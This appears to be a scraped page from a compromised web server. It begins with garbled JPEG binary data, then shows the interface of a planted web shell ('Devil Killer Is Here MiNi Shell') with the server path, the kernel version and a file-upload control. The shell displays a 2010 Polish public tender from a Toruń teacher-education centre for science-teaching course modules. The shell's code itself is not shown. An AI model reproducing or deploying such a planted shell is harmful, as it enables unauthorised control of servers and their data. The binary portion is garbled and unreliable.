JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100504/107821-N-2010.html

<p class="kh_header"><b>Toruń: przygotowanie autorskich scenariuszy i prowadzenie zajęć podczas kursu dla nauczycieli gimnazjów Skuteczne i nowoczesne nauczanie przedmiotów przyrodniczych, realizowanych w ramach Projektu pt. Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli</b><br>
<b>Numer ogłoszenia: 107821 - 2010; data zamieszczenia: 04.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kujawsko-Pomorskie Centrum Edukacji Nauczycieli , Aleja Solidarności 3, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 62 277 47, faks 56 62 231 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kpcen-torun.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przygotowanie autorskich scenariuszy i prowadzenie zajęć podczas kursu dla nauczycieli gimnazjów Skuteczne i nowoczesne nauczanie przedmiotów przyrodniczych, realizowanych w ramach Projektu pt. Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przygotowanie autorskich scenariuszy i prowadzenie zajęć podczas 16 edycji kursu dla nauczycieli gimnazjów Skuteczne i nowoczesne nauczanie przedmiotów przyrodniczych. 
2.	Prowadzący zajęcia ma spełniać wszystkie wymagania niezbędne i co najmniej trzy wymagania dodatkowe określone w rozdziale VIII niniejszej specyfikacji
3.	Zajęcia mają być realizowane w wymiarze godzinowym (ilość godzin zgodna zestawieniami przedstawionymi w niniejszej specyfikacji) wg ustalonego harmonogramu.
4.	Treści zajęć muszą odpowiadać celom wyszczególnionym niniejszej specyfikacji.
5.	Odbiór usługi zostanie udokumentowany przekazaniem Zamawiającemu scenariuszy zajęć, przekazaniem Zamawiającemu do powielenia materiałów dla uczestników kursu, zapisami w dzienniku kursu czasu i tematyki zajęć.

Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
Zamawiający nie przewiduje możliwości składania ofert wariantowych.
Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
Zamówienie składa się z części.
Częścią jest każdy moduł.
Do wszystkich części odnoszą się poniższe uwagi:
Cele kursu 

Cel ogólny :

Wykształcenie i rozwijanie kompetencji nauczycieli w zakresie skutecznego i nowoczesnego nauczania przedmiotów przyrodniczych w gimnazjum.

1.	Przewidywane efekty szkolenia. 
    
    Nauczyciel po ukończeniu szkolenia :

-zna czynniki wpływające na dobrą jakość pracy
-zna założenia reformy programowej - edukacja skuteczna, przyjazna i nowoczesna
-wie, od czego zależy skuteczność nauczania
-rozumie pojęcie kompetencje kluczowe w kontekście ustawicznego uczenia się i poszerzania kwalifikacji
-identyfikuje poszczególne przypadki osobowości i zdolności ucznia i potrafi dobrać metody pracy do indywidualnych potrzeb uczniowskich
-stosuje w swojej pracy różnorodne metody nauczania
-rozumie rolę wykorzystania technologii informacyjno - komunikacyjnej w nauczaniu
-wskazuje i wykorzystuje różne źródła informacji w pracy dydaktycznej
-wytwarza dydaktyczne materiały multimedialne
-dokonuje analizy jakościowej wyników egzaminu z części matematyczno-przyrodniczej posługując się językiem wymagań
-interpretuje wyniki egzaminów gimnazjalnych
-zna pojęcie edukacyjnej wartości dodanej i potrafi je zinterpretować
-przygotowuje narzędzia sprawdzające umiejętności przedmiotowe uczniów
-formułuje cele zajęć w języku zrozumiałym dla ucznia
-wdraża założenia integracji międzyprzedmiotowej
-planuje prowadzenie zajęć praktycznych z wykorzystaniem doświadczeń, obserwacji mikroskopowych oraz zajęć terenowych na ścieżce dydaktycznej
-podejmuje inicjatywy, współpracuje z różnymi podmiotami szkoły i organizacjami wspomagającymi system edukacji na rzecz podnoszenia skuteczności nauczania.
Wymagania  dotyczące opracowania scenariuszy zajęć:

1.	zgodność treści zajęć z celami ogólnymi programu i celami szczegółowymi modułu,
2.	dostosowanie struktury zajęć (zakres treści, ich logiczny układ, czas ich trwania) do celów programu,
3.	celowość doboru metod i form pracy,
4.	przydatność przewidywanych efektów szkolenia 
5.	zgodność treści szkolenia ze stanem aktualnej wiedzy teoretycznej i praktycznej na dany temat.

Zamawiający dopuszcza składanie ofert przez jednego Wykonawcę na każdą z części wyodrębnionych w przedmiocie zamówienia. Postanowienia specyfikacji, zwłaszcza dotyczące oceny ofert i wymaganych dokumentów dotyczą każdej części. 

Zamawiający zastrzega sobie, że ani całość, ani część zamówienia nie może być powierzona podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
posiadają:
-doświadczenie w zakresie prowadzenia szkoleń, kursów, wykładów dla nauczycieli 
i innych pracowników oświaty
-doświadczenie w pracy z uczniem w zakresie przedmiotów objętych szkoleniem minimum 10 lat, w tym 5 lat w gimnazjum</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
dysponują osobami zdolnymi do wykonania zamówienia, tj. osobami, które posiadają poniższe kwalifikacje zawodowe - warunki obowiązkowe:
-wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie tematyki objętej kursem i posiadanie stopnia awansu zawodowego nauczyciela dyplomowanego
-ukończone studia podyplomowe, kursy kwalifikacyjne lub tytuł naukowy

oraz wykażą spełnienie przynajmniej trzech z poniższych warunków opcjonalnych:

-ukończone kursy edukatorskie
-posiadają doświadczenie w zarządzaniu oświatą - pełnienie funkcji dyrektora, wicedyrektora gimnazjum (zespołu szkół) lub pełnienie funkcji doradcy metodycznego
-doświadczenie jako ekspert komisji kwalifikacyjnej lub egzaminacyjnej dla nauczycieli ubiegających się o awans zawodowy dla nauczycieli
-kilkuletnia praca jako egzaminatora, weryfikatora OKE
-autorstwo podręczników, publikacji lub programów szkoleń
-znaczące osiągnięcia w pracy dydaktyczno wychowawczej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - Przedstawiony scenariusz zajęć - 35</li>
<li>3 - Spełnianie kryteriów dodatkowych - 35</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Poza przypadkami określonymi w umowie zmiany umowy będą mogły nastąpić w wymienionych niżej okolicznościach:
a)	Zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar, inne klęski żywiołowe, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej.
b)	Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
c)	Powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
d)	Zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w momencie zawarcia umowy - zmianie mogą ulec termin realizacji umowy bądź terminy wynikające z harmonogramów płatności,
e)	Gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacja istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności w zakresie zmiany przedmiotu zamówienia,  terminu realizacji, a także innych wymienionych w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kpcen-torun.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kujawsko-Pomorskie Centrum Edukacji Nauczycieli
Ul. Al. Solidarności 3
87-100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2010 godzina 15:00, miejsce: Kujawsko-Pomorskie Centrum Edukacji Nauczycieli
Ul. Al. Solidarności 3
87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT WSPÓŁFINANSOWANY Z FUNDUSZY UNII EUROPEJSKIEJ W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI
Priorytet  IX, Rozwój wykształcenia i kompetencji w regionach
Działanie 9.4,Wysoko wykwalifikowane kadry systemu oświaty
Tytuł projektu: Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> MODUŁ 1
Skuteczne nauczanie przedmiotów przyrodniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe - uczestnik kursu:
-zna założenia reformy programowej - edukacja skuteczna, przyjazna i nowoczesna
-wie, od czego zależy skuteczność nauczania
-określa rolę nauczyciela wobec nowych zadań edukacyjnych
-diagnozuje potrzeby edukacyjne ucznia
-wie, jak motywować uczniów do nauki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MODUŁ 2
Kompetencje kluczowe w nauczaniu przedmiotów przyrodniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe - uczestnik kursu:
-rozumie pojęcie kompetencje kluczowe w kontekście ustawicznego uczenia się i poszerzania kwalifikacji
-zna składowe działań, umiejętności i postaw w zakresie poszczególnych kompetencji kluczowych
-określa własne kompetencje i tworzy listę własnych mocnych i słabych stron
-zna zmiany w podstawie programowej nauczania w gimnazjum
-potrafi odnaleźć w podstawie programowej ujęcia kompetencyjne celów i zadań edukacyjnych
-podaje przykłady metod kształcenia wybranych kompetencji w zakresie swojego przedmiotu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MODUŁ 3
Rola multimediów w efektywnym kształceniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe - uczestnik kursu:
-rozumie rolę wykorzystania technologii informacyjno - komunikacyjnej w nauczaniu
-stosuje różne środki pomocy medialnej
-planuje zajęcia z wykorzystaniem multimediów
-wskazuje i wykorzystuje różne źródła informacji w pracy dydaktycznej
-wytwarza dydaktyczne materiały multimedialne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MODUŁ 4
Efekty nauczania w świetle wyników z egzaminów zewnętrznych i edukacyjnej wartości dodanej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe - uczestnik kursu:
-interpretuje wyniki egzaminów gimnazjalnych
-posługuje się podstawowymi miernikami służącymi do analizy ilościowej wyników egzaminów
-dokonuje analizy jakościowej wyników egzaminu z części matematyczno-przyrodniczej w oparciu o standardy wymagań egzaminacyjnych i wymagania programowe
-zna pojęcie edukacyjnej wartości dodanej i potrafi je zinterpretować
-zna typologię podstawowych pisemnych zadań testowych
-przygotowuje przykładowe zadania z nauczanego przedmiotu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MODUŁ 5
Skuteczne i nowoczesne nauczanie biologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe - uczestnik kursu:
-formułuje cele zajęć w języku zrozumiałym dla ucznia
-stosuje nowoczesne metody nauczania biologii
-wdraża założenia integracji międzyprzedmiotowej
-planuje prowadzenie zajęć praktycznych z wykorzystaniem doświadczeń, obserwacji mikroskopowych oraz zajęć terenowych na ścieżce dydaktycznej
-projektuje materiały dydaktyczne
-przygotowuje narzędzia sprawdzające umiejętności przedmiotowe uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MODUŁ 6
Skuteczne i nowoczesne nauczanie chemii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe - uczestnik kursu:
-formułuje cele zajęć w języku zrozumiałym dla ucznia
-stosuje nowoczesne metody nauczania chemii
-wykorzystuje środki i materiały do prowadzenia pokazów nauczycielskich i organizacji eksperymentów uczniowskich
-tworzy scenariusze lekcji chemii z uwzględnieniem wymagań programowych oraz potrzeb i możliwości edukacyjnych uczniów 
-planuje, organizuje i przeprowadza zajęcia pozalekcyjne dla uczniów o specyficznych potrzebach edukacyjnych
-tworzy narzędzia służące diagnozowaniu kompetencji, jakie posiadł uczeń w ramach realizacji zajęć edukacyjnych z chemii..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MODUŁ 7
Skuteczne i nowoczesne nauczanie fizyki i astronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe - uczestnik kursu:
-formułuje cele zajęć w języku zrozumiałym dla ucznia
-stosuje nowoczesne metody nauczania fizyki
-tworzy scenariusze zajęć z fizyki uwzględniające doświadczenia uczniowskie i pokazowe
-przygotuje spis niezbędnych pomocy dydaktycznych
-tworzy narzędzia służące do sprawdzania kompetencji, jakie posiadł uczeń podczas zajęć edukacyjnych z fizyki
-planuje zajęcia fizyki z uwzględnieniem potrzeb i możliwości uczniów z uwzględnieniem wymagań programowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> MODUŁ 8
Skuteczne i nowoczesne nauczanie geografii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe - uczestnik kursu:
-formułuje cele zajęć w języku zrozumiałym dla ucznia
-stosuje nowoczesne metody w nauczaniu geografii
-tworzy scenariusze lekcji geografii w myśl neurolingwistycznego programowania, nauczania wielointeligentnego i obupółkulowego
-przygotowuje narzędzia sprawdzające kluczowe umiejętności, jakie posiadł uczeń w ramach zajęć edukacyjnych z geografii
-tworzy bank ćwiczeń terenowych zgodnie z wymaganiami szczegółowymi zawartymi w podstawie programowej
-dokonuje ewaluacji swojej pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
